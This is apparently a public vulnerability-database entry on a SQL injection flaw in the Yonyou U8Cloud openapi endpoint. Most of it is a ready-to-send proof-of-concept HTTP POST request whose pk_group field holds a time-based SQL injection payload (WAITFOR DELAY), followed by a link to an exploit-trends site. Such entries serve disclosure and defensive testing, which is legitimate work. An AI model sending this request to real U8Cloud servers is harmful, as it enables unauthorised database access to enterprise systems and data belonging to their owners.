用友U8Cloud openapi SQL注入漏洞

2026-02-03 用友U8cloud PoC Public

Description

用友U8Cloud openapi SQL注入漏洞

PoC

POST /u8cloud/openapi/ce.paper.query?appcode=lbsj&isEncrypt=N&trantype=paperexecute HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Connection: close
Accept-Encoding: gzip

{
    "paperexecute": [
        {
            "pk_group": "1'; WAITFOR DELAY '0:0:4'--",
            "pk_paper": "1"
        }
    ]
}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities